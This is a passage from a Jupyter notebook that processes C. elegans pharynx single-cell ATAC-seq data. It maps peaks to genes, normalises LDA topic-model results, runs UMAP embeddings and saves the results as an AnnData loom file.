numpy.loadtxt(orig_cell_names_path, dtype=object)[:,0]\n\norig_peak_names_path = '../tissue_analysis/pharynx/pharynx_all_peaks.zeros_filtered.bed'\norig_peak_row_headers = numpy.loadtxt(orig_peak_names_path, dtype=object)\n#chr_regex = re.compile('[:-]')\norig_peak_row_headers = numpy.hstack([orig_peak_row_headers, \n numpy.array(['name'] * orig_peak_row_headers.shape[0])[:,None]])\nprint(orig_peak_data.shape)\n\n#peak_binary = sps.csr_matrix((numpy.ones((peak_data_sparse.shape[0],)), \n# (peak_data_sparse[:,0], peak_data_sparse[:,1])))\n#print(peak_binary.shape)\n\n#make a cells x peaks array\npeak_data_array = peak_data.toarray().astype(numpy.int8)\nprint(peak_data_array.shape)\ndel(peak_data)\n\norig_peak_data_array = orig_peak_data.toarray().astype(numpy.int8)\nprint(orig_peak_data_array.shape)\ndel(orig_peak_data)", "(616, 8028)\n(616, 8693)\n(616, 8028)\n(616, 8693)\n" ], [ "cell_idx_map = [numpy.where(orig_cell_names == elt)[0][0] for elt in cell_names]\norig_peak_data_array_filtered = orig_peak_data_array[cell_idx_map]\nprint(orig_peak_data_array_filtered.shape)", "(616, 8693)\n" ], [ "numpy.median(numpy.sum(peak_data_array, axis=1))", "_____no_output_____" ], [ "numpy.median(numpy.sum(peak_data_array, axis=0))", "_____no_output_____" ], [ "numpy.max(peak_data_array)", "_____no_output_____" ] ], [ [ "## Analysis functions", "_____no_output_____" ] ], [ [ "REFDATA = 'ATAC_sequencing/2018_worm_atac/ref_data/WS235'\nrefseq_exon_bed = os.path.join(REFDATA, 'c_elegans.WS272.canonical_geneset.genes.common_names.sorted.bed.gz')\nimport gzip\nucsc = True if peak_row_headers[0][0].startswith('chr') else False\nwith gzip.open(refseq_exon_bed, 'rb') as lines_in:\n exon_locs = []\n for line in lines_in:\n line = line.decode()[3:].strip().split()\n if ucsc is True:\n line[0] = 'chr{!s}'.format(line[0])\n line[1] = int(line[1])\n line[2] = int(line[2])\n exon_locs.append(line)\n\ngene_locs = {}\nfor exon in exon_locs:\n gene_locs.setdefault(exon[3], []).append(exon)\nfor gene, locs in gene_locs.items():\n gene_locs[gene] = sorted(locs, key=lambda x:(x[1],x[2]))", "_____no_output_____" ], [ "class DistanceException(Exception):\n pass\nclass NoPeakException(Exception):\n pass\n\ndef get_closest_peaks(gene_name, row_headers, verbose=False, dist_threshold=1200, dist_excpt=False):\n gene_coord = gene_locs[gene_name][0] if gene_locs[gene_name][0][-1] == '+' else gene_locs[gene_name][-1]\n if verbose:\n print(gene_coord)\n if gene_coord[-1] == '+':\n try:\n nearest_peak = numpy.where(numpy.logical_and(row_headers[:,0] == gene_coord[0], \n row_headers[:,1].astype(int) <= gene_coord[1]))[0][-1]\n except IndexError:\n raise NoPeakException()\n alt_peak = nearest_peak - 1\n# peak_dist = numpy.absolute(gene_coord[1] - row_headers[[nearest_peak, alt_peak],1].astype(int))\n peak_dist = gene_coord[1] - row_headers[[nearest_peak, alt_peak],2].astype(int)\n if verbose:\n print(row_headers[[nearest_peak, alt_peak]])\n print(peak_dist)\n else:\n try:\n nearest_peak = numpy.where(numpy.logical_and(row_headers[:,0] == gene_coord[0], \n row_headers[:,2].astype(int) >= gene_coord[2]))[0][0]\n except IndexError:\n raise NoPeakException()\n alt_peak = nearest_peak + 1\n# peak_dist = numpy.absolute(gene_coord[2] - row_headers[[nearest_peak, alt_peak],2].astype(int))\n peak_dist = row_headers[[nearest_peak, alt_peak],1].astype(int) - gene_coord[2]\n if verbose:\n print(row_headers[[nearest_peak, alt_peak]])\n print(peak_dist)\n if peak_dist[0] > dist_threshold:\n msg = 'Warning: nearest peak to {!s} is far away! ({!s} bp)'.format(gene_name, peak_dist[0])\n if dist_excpt:\n raise DistanceException(msg)\n else:\n print(msg)\n return nearest_peak, alt_peak\n\ndef get_closest_peaks2(gene_name, row_headers, verbose=False, dist_threshold=1200, gene_end_threshold=100, dist_excpt=False):\n gene_coord = gene_locs[gene_name][0] if gene_locs[gene_name][0][-1] == '+' else gene_locs[gene_name][-1]\n# gene_coord = gene_locs[gene_name][0]\n# gene_coord[2] = gene_locs[gene_name][-1][2]\n if verbose:\n print(gene_coord)\n if gene_coord[-1] == '+':\n try: #same chromosome\n nearest_peaks = numpy.where(numpy.logical_and(row_headers[:,0] == gene_coord[0], \n #peak start is before gene stop\n #peak stop is after gene start - dist threshold and close to gene end\n numpy.logical_and(row_headers[:,1].astype(int) <= (gene_coord[2] + gene_end_threshold),\n row_headers[:,2].astype(int) >= (gene_coord[1] - dist_threshold))))[0]\n# numpy.logical_and(row_headers[:,2].astype(int) >= (gene_coord[1] - dist_threshold),\n# row_headers[:,2].astype(int) <= (gene_coord[2] + gene_end_threshold)))))[0]\n except IndexError:\n raise NoPeakException()\n# alt_peak = nearest_peak - 1\n# peak_dist = numpy.absolute(gene_coord[1] - row_headers[[nearest_peak, alt_peak],1].astype(int))\n peak_dist = gene_coord[1] - row_headers[nearest_peaks,1].astype(int)\n if verbose:\n print(row_headers[nearest_peaks])\n print(peak_dist)\n else:\n try:\n nearest_peaks = numpy.where(numpy.logical_and(row_headers[:,0] == gene_coord[0], \n numpy.logical_and(row_headers[:,2].astype(int) >= (gene_coord[1] - gene_end_threshold),\n row_headers[:,1].astype(int) <= (gene_coord[2] + dist_threshold))))[0]\n# numpy.logical_and(row_headers[:,1].astype(int) <= (gene_coord[2] + dist_threshold),\n# row_headers[:,1].astype(int) >= (gene_coord[1] - gene_end_threshold)))))[0]\n except IndexError:\n raise NoPeakException()\n# alt_peak = nearest_peak + 1\n# peak_dist = numpy.absolute(gene_coord[2] - row_headers[[nearest_peak, alt_peak],2].astype(int))\n peak_dist = row_headers[nearest_peaks,2].astype(int) - gene_coord[2]\n if verbose:\n print(row_headers[nearest_peaks])\n print(peak_dist)\n# if peak_dist[0] > dist_threshold:\n# msg = 'Warning: nearest peak to {!s} is far away! ({!s} bp)'.format(gene_name, peak_dist[0])\n# if dist_excpt:\n# raise DistanceException(msg)\n# else:\n# print(msg)\n return nearest_peaks\n\ndef get_gene_cells(gene_name, row_headers, peak_data_array, **kwargs):\n nearest_peaks = get_closest_peaks2(gene_name, row_headers, **kwargs)\n cells_idx = numpy.any(peak_data_array[:,nearest_peaks], axis=1)\n return cells_idx\n\ndef get_gene_idx(gene_name, row_headers, peaktopic_frac, topic_prob_threshold=0.5, **kwargs):\n nearest_peak, alt_peak = get_closest_peaks(gene_name, row_headers, **kwargs)\n topic_idx = numpy.argsort(peaktopic_frac[nearest_peak])[::-1]\n num_to_get = numpy.where(numpy.cumsum(peaktopic_frac[nearest_peak][topic_idx]) > topic_prob_threshold)[0][0] + 1\n return nearest_peak, topic_idx[:num_to_get]\n\ndef get_gene_topn_topics(gene_name, row_headers, peaktopic_frac, ntopics=1, **kwargs):\n nearest_peak, alt_peak = get_closest_peaks(gene_name, row_headers, **kwargs)\n topic_idx = numpy.argsort(peaktopic_frac[nearest_peak])[::-1]\n return nearest_peak, topic_idx[:ntopics]", "_____no_output_____" ] ], [ [ "## Topic Mode", "_____no_output_____" ] ], [ [ "doctopic_path = '../tissue_analysis/pharynx/0000_topics5_alpha3.000_beta2000.000/topic_mode.theta'\ndoctopic_peaks = numpy.loadtxt(doctopic_path, delimiter=',', dtype=float)\nprint(doctopic_peaks.shape)\n\n#center and scale the topic values\n#col_means = numpy.mean(doctopic.T, axis=0)\n#doctopic_norm = doctopic.T - col_means\n#doctopic_norm = doctopic_norm / numpy.std(doctopic_norm, axis=0)\n#doctopic_norm = doctopic_norm.T\n#print(doctopic_norm.shape)\n\ncol_means = numpy.mean(doctopic_peaks.T, axis=0)\ndoctopic_peaks_norm = doctopic_peaks.T - col_means\nl2_for_norm = (doctopic_peaks_norm ** 2).sum(axis=0).flatten() ** 0.5\ndoctopic_peaks_norm /= l2_for_norm\ndoctopic_peaks_norm = doctopic_peaks_norm.T\nprint(doctopic_peaks_norm.shape)\n\ndoctopic_peaks_frac = (doctopic_peaks.T/doctopic_peaks.sum(axis=1).astype(float)).T\nprint(doctopic_peaks_frac.shape)", "(616, 5)\n(616, 5)\n(616, 5)\n" ], [ "peaktopic_path = '../tissue_analysis/pharynx/0000_topics5_alpha3.000_beta2000.000/topic_mode.wordTopic'\npeaktopic = numpy.loadtxt(peaktopic_path, delimiter=',', dtype=float)\nprint(peaktopic.shape)\n\n#center and scale the topic values\n#col_means = numpy.mean(doctopic.T, axis=0)\n#doctopic_norm = doctopic.T - col_means\n#doctopic_norm = doctopic_norm / numpy.std(doctopic_norm, axis=0)\n#doctopic_norm = doctopic_norm.T\n#print(doctopic_norm.shape)\n\nnonzero_idx = numpy.where(numpy.sum(peaktopic, axis=1) > 0)[0]\npeaktopic = peaktopic[nonzero_idx]\npeak_row_headers = peak_row_headers[nonzero_idx]\npeak_data_array = peak_data_array[:,nonzero_idx]\n\ncol_means = numpy.mean(peaktopic.T, axis=0)\npeaktopic_norm = peaktopic.T - col_means\nl2_for_norm = (peaktopic_norm ** 2).sum(axis=0).flatten() ** 0.5\npeaktopic_norm /= l2_for_norm\npeaktopic_norm = peaktopic_norm.T\nprint(peaktopic_norm.shape)\n\npeaktopic_frac = (peaktopic.T/peaktopic.sum(axis=1).astype(float)).T\nprint(peaktopic_frac.shape)", "(8028, 5)\n(8028, 5)\n(8028, 5)\n" ], [ "doctopic_peaks_umap3_obj = umap.UMAP(n_components=3, random_state=253)\ndoctopic_peaks_umap3_res = doctopic_peaks_umap3_obj.fit_transform(doctopic_peaks_norm)\nprint(doctopic_peaks_umap3_res.shape)", "src/anaconda/envs/python3_remake2/lib/python3.6/site-packages/umap/spectral.py:229: UserWarning: Embedding 2 connected components using meta-embedding (experimental)\n n_components\n" ], [ "doctopic_peaks_umap2_obj = umap.UMAP(n_components=2, n_neighbors=15, random_state=1)\ndoctopic_peaks_umap2_res = doctopic_peaks_umap2_obj.fit_transform(doctopic_peaks_norm)\nprint(doctopic_peaks_umap2_res.shape)", "src/anaconda/envs/python3_remake2/lib/python3.6/site-packages/umap/spectral.py:229: UserWarning: Embedding 2 connected components using meta-embedding (experimental)\n n_components\n" ], [ "ncols=4\nnrows = int(numpy.ceil(doctopic_peaks_frac.shape[1]/ncols))\nfig, axes = pyplot.subplots(nrows=nrows, ncols=ncols, figsize=(3.5*ncols,3*nrows))\nfor idx, topic in enumerate(numpy.arange(doctopic_peaks_frac.shape[1])):\n row_idx, col_idx = int(idx/ncols), int(idx%ncols)\n if nrows > 1 and ncols > 1:\n ax = axes[row_idx, col_idx]\n elif nrows > 1 or ncols > 1:\n ax = axes[idx]\n else:\n ax = axes\n s = ax.scatter(doctopic_peaks_umap2_res[:,0], \n doctopic_peaks_umap2_res[:,1],\n cmap='viridis',\n c=doctopic_peaks_frac[:,topic],\n s=2)\n ax.set_ylabel('UMAP2')\n ax.set_xlabel('UMAP1')\n ax.set_title('Topic {!s}'.format(topic))\n cbar = fig.colorbar(s, ax=ax)\n#cbar.ax.set_yticklabels(gene_names, fontsize=10)\nfig.tight_layout()", "_____no_output_____" ] ], [ [ "## Construct an AnnData object and save it in loom format", "_____no_output_____" ] ], [ [ "def add_lda_result_to_anndata_obj(anndata_obj, lda_base, lda_cellnames, lda_peak_bed):\n\n filt_cellnames = numpy.loadtxt(lda_cellnames, dtype=object)[:,0]\n filt_cellnames_set = set(filt_cellnames)\n filt_cellnames_map = [(True, idx, numpy.where(filt_cellnames == elt)[0][0])\n if elt in filt_cellnames_set else (False, idx, numpy.nan)\n for idx, elt in enumerate(anndata_obj.obs.index.values)]\n unfilt_cellnames_idx, filt_cellnames_idx = [list(idx_tuple) for idx_tuple in zip(*[(elt[1], elt[2]) for elt in filt_cellnames_map if elt[0] is True])]\n anndata_obj.obs['lda_cell'] = [elt[0] for elt in filt_cellnames_map]\n\n theta = numpy.loadtxt(lda_base + '.theta', delimiter=',', dtype=float)\n unfiltered_theta = numpy.ones((len(filt_cellnames_map), theta.shape[1])) * numpy.nan\n unfiltered_theta[unfilt_cellnames_idx] = theta[filt_cellnames_idx]\n anndata_obj.obsm['lda_theta'] = unfiltered_theta\n\n col_means = numpy.mean(theta.T, axis=0)\n theta_norm = theta.T - col_means\n l2_for_norm = (theta_norm ** 2).sum(axis=0).flatten() ** 0.5\n theta_norm /= l2_for_norm\n theta_norm = theta_norm.T\n unfiltered_theta_norm = numpy.ones(unfiltered_theta.shape) * numpy.nan\n unfiltered_theta_norm[unfilt_cellnames_idx] = theta_norm[filt_cellnames_idx]\n anndata_obj.obsm['lda_theta_norm'] = unfiltered_theta_norm\n\n doctopic = numpy.loadtxt(lda_base + '.docTopic', delimiter=',', dtype=float)\n unfiltered_doctopic = numpy.ones(unfiltered_theta.shape) * numpy.nan\n unfiltered_doctopic[unfilt_cellnames_idx] = doctopic[filt_cellnames_idx]\n anndata_obj.obsm['lda_doctopic'] = unfiltered_doctopic\n\n doctopic_frac = (doctopic.T/doctopic.sum(axis=1)).T\n unfiltered_doctopic_frac = numpy.ones(unfiltered_theta.shape) * numpy.nan\n unfiltered_doctopic_frac[unfilt_cellnames_idx] = doctopic_frac[filt_cellnames_idx]\n anndata_obj.obsm['lda_doctopic_frac'] = unfiltered_doctopic_frac\n\n filt_peaks = numpy.loadtxt(lda_peak_bed, dtype=object)\n filt_peaks_str = ['{!s}\\t{!s}\\t{!s}'.format(*filt_peaks[idx,:3])\n for idx in range(filt_peaks.shape[0])]\n filt_peaks_set = set(filt_peaks_str)\n unfilt_peaks_str = ['{!s}\\t{!s}\\t{!s}'.format(anndata_obj.var['chr'][idx],\n anndata_obj.var['start'][idx],\n anndata_obj.var['stop'][idx])\n for idx in range(anndata_obj.var.shape[0])]\n filt_peaks_map = [(True, idx, filt_peaks_str.index(elt))\n if elt in filt_peaks_set else (False, idx, numpy.nan)\n for idx, elt in enumerate(unfilt_peaks_str)]\n unfilt_peaks_idx, filt_peaks_idx = [list(idx_tuple) for idx_tuple in zip(*[(elt[1], elt[2]) for elt in filt_peaks_map if elt[0] is True])]\n anndata_obj.var['lda_peak'] = [elt[0] for elt in filt_peaks_map]\n\n phi = numpy.loadtxt(lda_base + '.phi', delimiter=',', dtype=float).T\n unfiltered_phi = numpy.ones((anndata_obj.var.shape[0], phi.shape[1])) * numpy.nan\n unfiltered_phi[unfilt_peaks_idx] = phi[filt_peaks_idx]\n anndata_obj.varm['lda_phi'] = unfiltered_phi\n\n wordtopic = numpy.loadtxt(lda_base + '.wordTopic', delimiter=',', dtype=float)\n unfiltered_wordtopic = numpy.ones(unfiltered_phi.shape) * numpy.nan\n unfiltered_wordtopic[unfilt_peaks_idx] = wordtopic[filt_peaks_idx]\n anndata_obj.varm['lda_wordtopic'] = unfiltered_wordtopic\n\n wordtopic_frac = (wordtopic.T/wordtopic.sum(axis=1)).T\n unfiltered_wordtopic_frac = numpy.ones(unfiltered_phi.shape) * numpy.nan\n unfiltered_wordtopic_frac[unfilt_peaks_idx] = wordtopic_frac[filt_peaks_idx]\n anndata_obj.varm['lda_wordtopic_frac'] = unfiltered_wordtopic_frac\n\n return\n\ndef read_in_bow(bow_path, cell_names_path, feature_info_path, gene_name_map=None):\n try:\n bow_data_sparse = numpy.loadtxt(bow_path, dtype=int, skiprows=3)\n except StopIteration:\n #probably NFS lag; just wait a few seconds and try again\n time.sleep(10)\n bow_data_sparse = numpy.loadtxt(bow_path, dtype=int, skiprows=3)\n open_func, open_mode = (gzip.open, 'rb') if bow_path.endswith('.gz') else (open, 'rb')\n with open_func(bow_path, open_mode) as lines_in:\n cellnum = int(lines_in.readline().decode().strip())\n featnum = int(lines_in.readline().decode().strip())\n bow_data = sps.csr_matrix((bow_data_sparse[:,2],\n (bow_data_sparse[:,0] - 1,\n bow_data_sparse[:,1] - 1)),\n shape=(cellnum, featnum))\n\n try:\n cell_names = numpy.loadtxt(cell_names_path, dtype=object)[:,0]\n except StopIteration:\n time.sleep(10)\n cell_names = numpy.loadtxt(cell_names_path, dtype=object)[:,0]\n\n try:\n feature_info_bed = numpy.loadtxt(feature_info_path, dtype=object)\n except StopIteration:\n time.sleep(10)\n feature_info_bed = numpy.loadtxt(feature_info_path, dtype=object)\n col_names = ['chr', 'start', 'stop', 'name', 'score', 'strand']\n num_cols = feature_info_bed.shape[1]\n if num_cols <= 6:\n col_names = col_names[:num_cols]\n else:\n col_names = col_names + list(numpy.arange(6, num_cols).astype(str))\n\n anndata_obj = anndata.AnnData(X=bow_data,\n obs=pandas.DataFrame(index=cell_names),\n var=pandas.DataFrame(data=feature_info_bed,\n columns=col_names))\n if gene_name_map is not None:\n gene_name_map = numpy.loadtxt(gene_name_map, delimiter='\\t', dtype=object)\n gene_name_map = dict([gene_name_map[idx] for idx in range(gene_name_map.shape[0])])\n anndata_obj.var['common_name'] = [gene_name_map.get(elt, elt) for elt in anndata_obj.var.name]\n\n return anndata_obj", "_____no_output_____" ], [ "#make and save anndata object\nimport anndata\nimport pandas\n\n#first, read in the original BOW data (the unfiltered data)\norig_peaktable_path = '../tissue_analysis/pharynx/pharynx_all_peaks.bow'\norig_cell_names_path = '../tissue_analysis/pharynx/pharynx_all_peaks.zeros_filtered.indextable.txt'\norig_peak_names_path = '../tissue_analysis/pharynx/pharynx_all_peaks.zeros_filtered.bed'\n\nanndata_obj = read_in_bow(orig_peaktable_path, orig_cell_names_path, orig_peak_names_path)\n\n#next, add the LDA results, taking into account that some of the cells/peaks were filtered out before running LDA\nlda_base = '../tissue_analysis/pharynx/0000_topics5_alpha3.000_beta2000.000/topic_mode'\nlda_cellnames = '../tissue_analysis/pharynx/filtered_peaks_iqr4.0_low_cells.indextable.txt'\nlda_peak_bed = '../tissue_analysis/pharynx/filtered_peaks_iqr4.0_low_cells.extra_cols.bed'\nadd_lda_result_to_anndata_obj(anndata_obj, lda_base, lda_cellnames, lda_peak_bed)\n\nprint(anndata_obj)", "src/anaconda/envs/python3_remake2/lib/python3.6/site-packages/anndata/_core/anndata.py:21: FutureWarning: pandas.core.index is deprecated and will be removed in a future version. The public classes are available in the top-level namespace.\n from pandas.core.index import RangeIndex\nTransforming to str index.\n" ], [ "umap_to_add = numpy.zeros((anndata_obj.shape[0], doctopic_peaks_umap2_res.shape[1])) * numpy.nan\nanndata_idx = numpy.where(anndata_obj.obs.lda_cell)[0]\numap_idx = [numpy.where(cell_names == elt)[0][0] for elt in anndata_obj.obs[anndata_obj.obs.lda_cell].index.values]\numap_to_add[anndata_idx] = doctopic_peaks_umap2_res[umap_idx]\nprint(umap_to_add.shape)\nanndata_obj.obsm['umap2'] = umap_to_add\n\numap_to_add = numpy.zeros((anndata_obj.shape[0], doctopic_peaks_umap3_res.shape[1])) * numpy.nan\nanndata_idx = numpy.where(anndata_obj.obs.lda_cell)[0]\numap_idx = [numpy.where(cell_names == elt)[0][0] for elt in anndata_obj.obs[anndata_obj.obs.lda_cell].index.values]\numap_to_add[anndata_idx] = doctopic_peaks_umap3_res[umap_idx]\nprint(umap_to_add.shape)\nanndata_obj.obsm['umap3'] = umap_to_add", "(616, 2)\n(616, 3)\n" ], [ "anndata_obj.write_loom('../tissue_analysis/pharynx/primary_lda_results.loom', \n write_obsm_varm=True)", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ] ]